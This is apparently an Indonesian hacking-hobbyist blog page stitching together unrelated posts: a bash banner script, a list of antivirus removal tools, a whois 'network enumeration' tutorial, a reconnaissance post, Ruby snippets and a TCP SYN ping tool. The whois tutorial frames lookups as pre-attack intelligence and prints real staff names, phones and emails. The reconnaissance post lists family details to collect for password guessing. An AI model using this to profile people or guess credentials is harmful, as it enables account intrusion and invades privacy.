echo -e “${lightgreen}Date: \t\t\t${red}” `date +”%d-%m-%Y”`
echo -e “${lightgreen}User: \t \t \t${red}” `whoami`
echo -ne “${lightgreen}$HOSTNAME ${lightgreen}uptime is: ${red} \t \t “;uptime | awk /’up/ {print $3,$4,$5,$6,$7,$8,$9,$10}’
#List network
echo -ne “${lightgreen}Ip address: \t \t ${red}” ;lynx -dump -hiddenlinks=ignore -nolist http://checkip.dyndns.org:8245/ | grep “Current IP Address” | cut -d”:” -f2 | cut -d” ” -f2

echo “”
echo -e “${lightgreen}Indonesian Backtrack Team”
echo -ne “${white}${italic}the quieter you become, the more you able to hear”
echo -e “\t \t ${cyan}@${white}k${lightgreen}y${white}o${red}s${yellow}h${green}i${blue}r${purple}o${lightred}6${lightgray}7″
echo -ne “${lightblue}” ; echo “=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=”

code thx to : fryme joe

have fun :)

Malware Cleaner | Tools2 Khusus Utk Membersihkan Virus/Worm Khusus

Berikut adalah daftar link-link penyedia piranti lunak untuk menghilangkan Malware (Virus,Worm,Trojan,dll) yang siftanya Khusus (Malware Khusus). Malware Khusus (Special) adalah Malware yang bisa dilumpuhkan menggunakan Removal Tools khusus,
Jelas.... Malware Khusus ini berbeda dengan Malware yang biasa beredar & hinggap pada Mesin anda.
Contoh Malware Khusus : Virus Virut,Worm DownAdup (Conficker), Virus Sality,dll

1.Norman Malware Cleaner
[URL="http://www.norman.com/support/support_tools/malware_cleaner/"]Download Here[/URL]

2.Avast! Virus Cleaner
[URL="http://www.avast.com/free-virus-cleaner"]Download Here[/URL]

3.Symantec Virus Removal Tools
[URL="http://www.symantec.com/business/security_response/removaltools.jsp"]Download Here[/URL]

4.Panda Quick Remover
[URL="http://www.pandasecurity.com/homeusers/downloads/repair-utilities/"]Download Here[/URL]

5.AVG Virus Removal Tools
[URL="http://www.avg-antivirus.com.au/avg_virus_removal.htm"]Download Here[/URL]

6.Bit Defender Free Virus Removal Tools
[URL="http://www.bitdefender.co.uk/site/Downloads/browseFreeRemovalTool/"]Download Here[/URL]

7.Kaspersky Virus Removal Tools
[URL="http://www.kaspersky.co.uk/virus-removal-tools"]Download Here[/URL]

8.McAfee Stinger
[URL="http://www.mcafee.com/us/downloads/free-tools/stinger.aspx"]Download Here[/URL]

9.Dr.Web Cure It! Keren tapi Trial :'( Doi udah sering nemein ane nyari duit.
[URL="http://www.freedrweb.com/cureit/?lng=en"]Download Here[/URL]

10.Sunbelt Vipre Rescue
[URL="http://live.sunbeltsoftware.com/"]Download Here[/URL]

11.Avira AntiVir Removal Tools : [URL="http://www.avira.com/en/support-download-avira-antivir-removal-tool"]Download Here[/URL]
Avira Registry Cleaner : [URL="http://www.avira.com/en/support-download-avira-registrycleaner"]Download Here[/URL]
Avira Anti-Rootkit : [URL="http://www.avira.com/en/support-download-avira-antirootkit-tool"]Download Here[/URL]

12.Microsoft Malicious Software Removal Tool
[URL="http://www.microsoft.com/security/malwareremove/default.aspx"]Download Here[/URL]

13.AhnLab Removal Tools
[URL="http://global.ahnlab.com/en/site/download/removal/removalList.do"]Download Here[/URL]

14.CAT-Quick Heal Free Usefull Tools
[URL="http://www.quickheal.com/useful-tools.asp"]Download Here[/URL]

15.Comodo Anti-Malware BOClean : [URL="http://www.comodo.com/home/internet-security/anti-malware.php"]Download Here[/URL]
Comodo System Cleaner : [URL="http://www.comodo.com/home/support-maintenance/system-cleaner.php"]Download Here[/URL]

16.Eset Virus Removal Tools
[URL="http://www.eset.co.uk/Download/VirusRemoval"]Download Here[/URL]

17.K7 Computing Free Tools
[URL="http://www.k7computing.com/en/Free-Tools/Free-Tools.php"]Download Here[/URL]

18.ViRobot Removal Tools
[URL="http://www.hauri.net/download/vaccine.html"]Download Here[/URL]

19.Virus Buster Free Tools
[URL="http://www.virusbuster.hu/en/download/free-tools"]Download Here[/URL]

20.VBA32 Console Scanner : [URL="http://www.anti-virus.by/en/vba32check.shtml"]Download Here[/URL]
[URL="http://www.anti-virus.by/en/vba32arkit.shtml"]VBA32 Anti-Rootkit[/URL]

Silahkan tambahkan lagi jika ada yang lain akan saya posting di atas

Network Enumeration Target by Onno W Purbo

Teknik Network Enumeration merupakan salah satu langkah yang harus dilakukan dalam melakukan footprinting, istilah keren-nya intelejen awal sebelum melakukan serangan. Dalam proses mengevaluasi network ini, kita biasanya menggunakan perintah whois (yang tersedia di Linux).

Tentunya kita harus tahu dimana lokasi server whois yang memungkinkan kita memperoleh informasi yang kita butuhkan. Bagi anda yang ingin melihat informasi host di luar negeri bisa di check berbagai server di http://www.allwhois.com, whois.apnic.net, whois.networksolutions.com, whois.crsnic.net, whois.internic.net. Bagi anda yang ingin mengevaluasi host dalam domain *.id, ada baiknya mencoba menggunakan mesin whois.idnic.net.id, karena sebagian informasi whois domain ID terdapat di mesin tersebut.

Domain Query

Dengan menggunakan “whois domain@whois.nicserver” kita dapat memperoleh organisasi yang menggunakan domain yang akan di serang. Sebagai contoh, dibawah kita meminta informasi tentang domain telkom.co.id melalui idnic.net.id.

[root@gate onno]# whois telkom.co.id@whois.idnic.net.id
[whois.idnic.net.id]
warning: 'rwhoisd' user id is unknown -- unable to change id
warning: running as root
%rwhois V-1.5:003fff:00 localhost (by Network Solutions, Inc. V-1.5.7)
domain:Class-Name:domain
domain:ID:telkom2-DOM-IDNIC
domain:Auth-Area:id
domain:Guardian;I:telkom2-GRD-IDNIC
domain:Domain-Name:telkom.co.id
domain:Primary-Server;I:ns1104-HST-IDNIC
domain:Secondary-Server;I:ns2128-HST-IDNIC
domain:OrganizationTongueT TELEKOMUNIKASI INDONESIA, tbk
domain:Admin-Contact;I:epi1-IDNIC
domain:Tech-Contact;I:eph1-IDNIC
domain:Billing-Contact;I:epi1-IDNIC
domain:Created:19950518
domain:Updated:19980431
domain:Updated-By:hostmaster@idnic.net.id

%error 350 Invalid Query Syntax
%ok


Sebagai contoh tambahan, kita melakukan juga query untuk domain telkom.net.id melalui whois.idnic.net.id.

[root@gate onno]# whois telkom.net.id@whois.idnic.net.id
[whois.idnic.net.id]
warning: 'rwhoisd' user id is unknown -- unable to change id
warning: running as root
%rwhois V-1.5:003fff:00 localhost (by Network Solutions, Inc. V-1.5.7)
domain:Class-Name:domain
domain:ID:telkom1-DOM-IDNIC
domain:Auth-Area:id
domain:Guardian;I:telkom1-GRD-IDNIC
domain:Domain-Name:telkom.net.id
domain:Primary-Server;I:ns136-HST-IDNIC
domain:Secondary-Server;I:ns2129-HST-IDNIC
domain:Secondary-Server;I:ns316-HST-IDNIC
domain:OrganizationTongueT TELEKOMUNIKASI INDONESIA, tbk
domain:Admin-Contact;I:eph1-IDNIC
domain:Tech-Contact;I:is8-IDNIC
domain:Billing-Contact;I:de21-IDNIC
domain:Created:19960514
domain:Updated:20001009
domain:Updated-By:hostmaster@idnic.net.id

%error 350 Invalid Query Syntax
%ok

Kebanyakan berbagai informasi yang diperoleh masih berupa kode-kode yang harus di evaluasi lebih lanjut menggunakan perintah whois ke server whois yang sama. Tapi jelas bahwa organisasi yang menggunakan telkom.co.id & telkom.net.id adalah PT. Telekomunikasi Indonesia, Tbk.

Point of Contact Query
Ada dua (2) kontak person yang biasanya terdapat dalam informasi whois, yaitu Administrator Contact & Technical Contact. Sialnya, nama contact tersebut biasanya tertulis dalam kode kriptik. Untuk melihat siapa, no. telepon, alamat dsb dari kontak person yang menguasai domain yang dimaksud dapat dilakukan dengan sederhana dengan memasukan nama kode / handle dari kontak person tersebut ke server whois.

Sebagai contoh di bawah ini, kita melihat handle epi1-IDNIC & eph1-IDNIC yang menjadi kontak domain Telkom.

[root@gate onno]# whois epi1-IDNIC@whois.idnic.net.id
[whois.idnic.net.id]
warning: 'rwhoisd' user id is unknown -- unable to change id
warning: running as root
%rwhois V-1.5:003fff:00 localhost (by Network Solutions, Inc. V-1.5.7)
contact:Class-Name:contact
contact:ID:epi1-idnic
contact:Auth-Area:id
contact:Name:Epy Ponco Istiyono
contact:Email:ponco@telkom.net.id
contact:Type:I
contact:Phone:022-4523225
contact:Fax:022-4523232
contact:Organization;ITongueT TELEKOMUNIKASI INDONESIA
contact:Occupation;ITonguej. Manager MONICE - DIVMEDIA
contact:Address;I:Jln Kebonsirih 37;JAKARTA;INDONESIA
contact:Created:951229
contact:Updated:980431
contact:Updated-By:hostmaster@idnic.net.id

%ok

[root@gate onno]# whois eph1-idnic@whois.idnic.net.id
[whois.idnic.net.id]
warning: 'rwhoisd' user id is unknown -- unable to change id
warning: running as root
%rwhois V-1.5:003fff:00 localhost (by Network Solutions, Inc. V-1.5.7)
contact:Class-Name:contact
contact:ID:eph1-idnic
contact:Auth-Area:id
contact:Name:Ery Punta Hendraswara
contact:Email:phunta@telkom.net.id
contact:Type:I
contact:Phone:021-5229248
contact:Fax:021-5222296
contact:Organization;ITongueT TELEKOMUNIKASI INDONESIA
contact:Occupation;I:Staff GNOC - DIVMEDIA
contact:Address;I:Jln Gatot Subroto no 52, Lantai 3;Jakarta;INDONESI
contact:Created:951229
contact:Updated:980431
contact:Updated-By:hostmaster@idnic.net.id

%ok

Kita lihat dengan jelas nama, alamat, jabatan, divisi internal di Telkom, nomor telepon, e-mail address dsb. Lumayan lengkap untuk mengetahui secara pasti lokasi-lokasi mereka.

Name Server Query
Yang akan sangat bermanfaat juga pada saat melakukan network enumeration adalah melihat mesin mana saja yang membawa informasi domain dari target sasaranan. Hal ini dapat dilihat dari entry NS (Name Server). Biasanya ada pada pada entry Primary-Server & Secondary Server. Untuk melihat lebih detail, kode kriptik yang ada pada informasi awal, kita masukan kembali kepada server whois untuk memperoleh informasi lebih lengkap.

Pada tampilan berikut diperlihatkan informasi tentang name server yang membawa informasi telkom.co.id.

[root@gate onno]# whois ns1104-hst-idnic@whois.idnic.net.id
[whois.idnic.net.id]
warning: 'rwhoisd' user id is unknown -- unable to change id
warning: running as root
%rwhois V-1.5:003fff:00 localhost (by Network Solutions, Inc. V-1.5.7)
host:Class-Name:host
host:ID:ns1104-HST-IDNIC
host:Auth-Area:id
host:Host-Name:ns1.telkom.co.id.
host:IP-Address:202.134.0.155
host:Created:981104
host:Updated:981104
host:Updated-By:hostmaster@idnic.net.id

%ok

[root@gate onno]# whois ns2128-hst-idnic@whois.idnic.net.id
[whois.idnic.net.id]
warning: 'rwhoisd' user id is unknown -- unable to change id
warning: running as root
%rwhois V-1.5:003fff:00 localhost (by Network Solutions, Inc. V-1.5.7)
host:Class-Name:host
host:ID:ns2128-HST-IDNIC
host:Auth-Area:id
host:Host-Name:ns2.telkom.co.id.
host:IP-Address:202.134.2.5
host:Created:981104
host:Updated:981104
host:Updated-By:hostmaster@idnic.net.id

%ok

Informasi yang penting yang dapat di tarik disini adalah nama mesin & IP address-nya. Hal ini sudah cukup untuk melakukan evaluasi lebih lanjut dari jaringan mereka.

Tentunya masih banyak yang bisa kita evaluasi menggunakan whois. Dengan informasi yang ada di tangan sekarang, sudah cukup lumayan untuk melakukan pemetaan jaringan dsb.

Onno W Purbo

Pemahaman Tahap Reconaissance dalam Penentration Tester

Reconaissance dalam tahap penentration tester yaitu tahap pengumpulan data. Pada tahap ini seorang penentration tester mengumpulkan data sebanyak banyaknya.
Teman teman pasti bertanya, data apa saja yang dikumpulkan ? jawabannya adalah banyak !!!

Berikut adalah data data yang dikumpulkan oleh seorang penentration tester :
- Nama Lengkap
- Nama Orang Tua
- Nama Istri
- Nama Anak
- Tempat Lahir
- Tempat Lahir Istri
- Tempat Lahir Anak
- Tempat Lahir Orang Tua
- Tanggal Lahir
- Tanggal Lahir Anak
- Tanggal Lahir Istri
- Tanggal Lahir Orang Tua
- Alamat Rumah
- Alamat Kantor
- Nomor telepon atau Handphone
- Nomor Plat Kendaraan
- Hobi
- Club Sepak Bola Favorite
- Angka Favorite
- Artis Favorite
- dll (Anda bisa berkreasi sendiri)

Semuanya dikumpulkan oleh seorang penentration tester untuk mendapatkan informasi sebanyak banyaknya. Tahap inilah yang biasa disebut sebagai tahap reconaissance.

Lalu pertanyaannya "Apakah data data tersebut berguna ?"
Jawabannya "Ya, Berguna Sekali"

Data data tersebut berguna sekali bagi seorang Hacker untuk melakukan aksinya. coba sekarang anda jawab dalam hati, apakah nomor PIN ATM anda merupakan salah satu dari data diatas ? Bagaimana jika ada seorang hacker yang sudah tau data data anda dan kemudian mencuri dompet anda ? Jawabannya adalah "duit anda lenyap semua".

Jika seorang Hacker menemukan website yang dibuat oleh si target operasi, hacker tinggal memasukkan kombinasi kombinasi dari data data yang didapat dari hasil tahapan reconasissance. Itu lebih mempermudah dalam melakukan aksinya.

Misalkan saja, ternyata password administrator sebuah website tersebut menggunakan tanggal lahir anak dari si administrator, anggap saja passwordnya adalah 12SEPTEMBER2007. Jika si hacker menggunakan tehnik brute force untuk mendapatkan lima belas digit angka tersebut, coba bayangkan berapa tahun waktu yang diperlukan dengan tehnik brute force sehingga bisa nemembus angka tersebut ? ditambah lagi dengan bandwith koneksi anda yang belum tentu cepat dan stabil tidak terputus selama tahunan.

Oleh karena itu, tahap ini merupakan tahap yang penting dalam proses penentratin testing. Bahasan tentang reconaissance lainnya akan saya buat pada thread thread selanjutnya.

Semoga artikel sederhana yang saya buat ini berguna dan menambah pengetahuan teman teman.

Regards,

trixie

Ruby Sequel

Baru saja saya dibutuhkan untuk menulis scipt dengan cara migrate data dari satu database ke yang lain, sebagai lamer saya mencari sebuah versi baru dari salah satu aplikasi internal perusahaan perangkat lunak. Daripada hanya menulis secara rutin sesuatu di PHP, saya memutuskan untuk memberikan Sequel a shot.

Sequel menyajikan database untuk Anda seolah-olah nested set of arrays. script saya adalah versi yang lebih besar dan hanya sedikit lebih rumit dari script sederhana berikut:
sourcedb = Sequel.open 'postgres://user:pass@x.x.x.x/dbname'
destdb
= Sequel.open 'postgres://user:pass@y.y.y.y/dbname'

destdb
.transaction do

  destdb
[:devicemodel].delete

  sourcedb
[:devicemodel].each do |row|

   
# perform fixup/conversion here

    destdb
[:devicemodel] << row
 
end

 
# other tables here

end


Jika anda hanya ingin menjalan kan SQL anda harus tau persis apa yang harus anda lakukan secara mudah dan hasilnya saya kembalikan kepada anda sendiri, Jika anda dalam kesulitan anda dapat beralih menggunakan script di atas
  emails = db["select distinct emailcontact from contact where accountkey in (select
distinct accountkey from contract)"
].all

  emails
.each do |row|
   
next if row[:emailcontact].nil?
    puts row
[:emailcontact]
 
end


Untuk informasi menyeluruh mengenai introduction saya pernah membaca interview dengan Sharon Rosner, pencipta Sequel, mendiskusikan mengapa Sequel lahir dan di mana itu cocok dibandingkan dengan Tools ORM yang ada. untuk migration script, ini bagus, memungkinkan saya untuk menulis loop sederhana memanipulasi data sebagai array, namun memungkinkan saya untuk melakukan raw SQL di mana pun lebih mudah.

Ruby GD2 and Gradients

Sepertinya Ruby's GD2 gem tidak mendukung gradien luar kotak. Ada tons implementasi gradien PHP di luar sana, jadi saya meminjam ide dari mereka untuk menciptakannya berikut dengan menggunakan Ruby's GD2 gems
require 'rubygems'
require 'gd2'

# monkey patch in a gradient method
module GD2
 
class Canvas
   
def gradient(x1, y1, x2, y2, r1, g1, b1, r2, g2, b2)
      height
= y2 - y1
      r_delta
= (r1 - r2) / height
      g_delta
= (g1 - g2) / height
      b_delta
= (b1 - b2) / height

      my_y
= y1
      my_r
= r1
      my_g
= g1
      my_b
= b1

     
0.upto(height) do |i|
        self
.color = @image.palette.resolve Color[my_r, my_g, my_b]
        self
.rectangle(x1, my_y, x2, my_y + 1, true)

        my_y
+= 1
        my_r
-= r_delta
        my_g
-= g_delta
        my_b
-= b_delta
     
end
   
end
 
end
end


if __FILE__ == $0
  colors
= [[0.77, 0.12, 0.23], [1.00, 0.49, 0.04], [0.67, 0.83, 0.45],
           
[0.41, 0.80, 0.94], [0.96, 0.55, 0.73], [1.00, 1.00, 1.00],
           
[1.00, 0.96, 0.41], [0.14, 0.35, 1.00], [0.58, 0.51, 0.79],
           
[0.78, 0.61, 0.43]]

  i
= 1
  colors
.each do |c|
    image
= GD2::Image.new(50, 50)
    image
.draw do |pen|
      pen
.gradient(0, 0, 100, 100, c[0], c[1], c[2], 0, 0, 0)
   
end
    image
.export("gradient-#{i}.png")
    i
+= 1
 
end
end
Monkey patching for the win :-). Kode apa adanya hanya menciptakan gradien vertikal, tapi hei, ia bekerja dan mungkin itu akan berguna bagi seseorang.

Hacking TCP/IP with tcpping

tcpping adalah sebuah Tools dan saya menulis untuk menentukan latency jaringan antara dua titik meskipun penyaringan ICMP. Idenya adalah cukup banyak hanya seperti ping normal, tapi bukannya menggunakan ICMP, ia akan mengirimkan paket TCP SYN ke target dan waktu berapa lama untuk menerima SYN berikutnya / ACK atau RSTS..

Semuanya dimulai ketika saya sedang surfing di sekitar penyedia berbagai web hosting. Di antara kriteria lainnya, saya mencoba untuk menemukan satu yang tidak terlalu tinggi latency dari mesin saya di sini di rumah jadi bekerja pada mereka tidak akan menjadi fest lag lengkap. Tapi sejumlah penyedia memiliki ICMP disaring sehingga Anda tidak bisa ping situs web mereka, dan tidak bisa mengatakan apa latency seperti.

Tools ini menggunakan libnet untuk membuat dan mengirimkan sebuah paket SYN dibuat untuk taget, and libpcap dan libpcap untuk mengendus untuk lalu lintas kembali. Jika port yang Anda pilih (default 80) pada server target memiliki layanan ini, target mengirimkan kembali paket SYN / ACK. Sistem operasi lokal Anda mendapatkan paket ini, tidak tahu apa yang harus dilakukan dengan itu, dan kemudian mengirimkan target paket RST. Ini sebenarnya cukup bagus karena membersihkan semuanya jadi kami tidak dapat dituduh menciptakan ton setengah terbuka koneksi TCP. Jika Anda memilih port pada target yang tidak memiliki layanan ini (dan tidak disaring), target mengirimkan kembali paket RST. Anda OS lokal hanya menurunkan ini.

Berikut adalah beberapa contoh output, secara default ping port 80 (web server yang berjalan):
[6:22pm] trixie:~/proj/tcpping-% sudo ./tcpping bekasi
TCP PING bekasi.internal.kehlet.cx (10.16.81.2:80) on en1
SYN/ACK from 10.16.74.2: seq=1 ttl=64 time=1.047ms
SYN/ACK from 10.16.74.2: seq=2 ttl=64 time=0.965ms
SYN/ACK from 10.16.74.2: seq=3 ttl=64 time=1.081ms
SYN/ACK from 10.16.74.2: seq=4 ttl=64 time=1.245ms
^C
--- bekasi.internal.kehlet.cx TCP ping statistics ---
4 SYN packets transmitted, 4 SYN/ACKs and 0 RSTs received, 0.0% packet loss
round-trip min/avg/max = 0.965/1.084/1.245 ms


Berikut adalah Tools dalam tindakan terhadap port 92, yang akan mengirimkan kembali RSTS (no service yang berjalan pada port itu):
[6:22pm] trixie:~/proj/tcpping-% sudo ./tcpping -p 92 bekasi
TCP PING bekasi.internal.kehlet.cx (10.16.81.2:92) on en1
RST from 10.16.74.2: seq=1 ttl=64 time=0.862ms
RST from 10.16.74.2: seq=2 ttl=64 time=1.040ms
RST from 10.16.74.2: seq=3 ttl=64 time=1.019ms
RST from 10.16.74.2: seq=4 ttl=64 time=1.044ms
^C
--- bekasi.internal.kehlet.cx TCP ping statistics ---
4 SYN packets transmitted, 0 SYN/ACKs and 4 RSTs received, 0.0% packet loss
round-trip min/avg/max = 0.862/0.991/1.044 ms


Dengan modus verbose (-v), alat akan menunjukkan paket-paket yang sebenarnya. Berikut adalah sebuah situs yang menyaring ping ICMP, tapi kita bisa menyiasati itu dengan tcp ping:
[6:25pm] trixie:~/proj/tcpping-% sudo ./tcpping -v www.apollohosting.com
TCP PING www.apollohosting.com (208.56.13.233:80) on en1
1076828929.146519 10.16.74.8:8674 -> 208.56.13.233:80 [S]
1076828929.238506 208.56.13.233:80 -> 10.16.74.8:8674 [SA]
SYN/ACK from 208.56.13.233: seq=1 ttl=48 time=90.847ms
1076828929.240317 10.16.74.8:8674 -> 208.56.13.233:80 [R]
1076828930.241348 10.16.74.8:61062 -> 208.56.13.233:80 [S]
1076828930.326531 208.56.13.233:80 -> 10.16.74.8:61062 [SA]
SYN/ACK from 208.56.13.233: seq=2 ttl=48 time=85.162ms
1076828930.328364 10.16.74.8:61062 -> 208.56.13.233:80 [R]
1076828931.329304 10.16.74.8:17802 -> 208.56.13.233:80 [S]
1076828931.412466 208.56.13.233:80 -> 10.16.74.8:17802 [SA]
SYN/ACK from 208.56.13.233: seq=3 ttl=48 time=83.164ms
1076828931.414274 10.16.74.8:17802 -> 208.56.13.233:80 [R]
1076828932.415249 10.16.74.8:60598 -> 208.56.13.233:80 [S]
1076828932.496567 208.56.13.233:80 -> 10.16.74.8:60598 [SA]
SYN/ACK from 208.56.13.233: seq=4 ttl=48 time=81.255ms
1076828932.498290 10.16.74.8:60598 -> 208.56.13.233:80 [R]
^C
--- www.apollohosting.com TCP ping statistics ---
4 SYN packets transmitted, 4 SYN/ACKs and 0 RSTs received, 0.0% packet loss
round-trip min/avg/max = 1.000/85.107/90.847 ms


Anda dapat melihat dari atas perilaku yang saya dijelaskan: kita mengirim paket SYN palsu, target mengirimkan kembali SYN / ACK (di mana titik tools mencetak informasi waktu). Hanya setelah itu OS lokal mengirim RST ke target.

Jika tools ini berguna bagi Anda saya akan merasa senang dan jika masih bingung, silakan beritahu saya.
 

I'M A LAMER DON'T TROLL ME mas[TER] Copyright © 2013 | Powered by rifsivk yum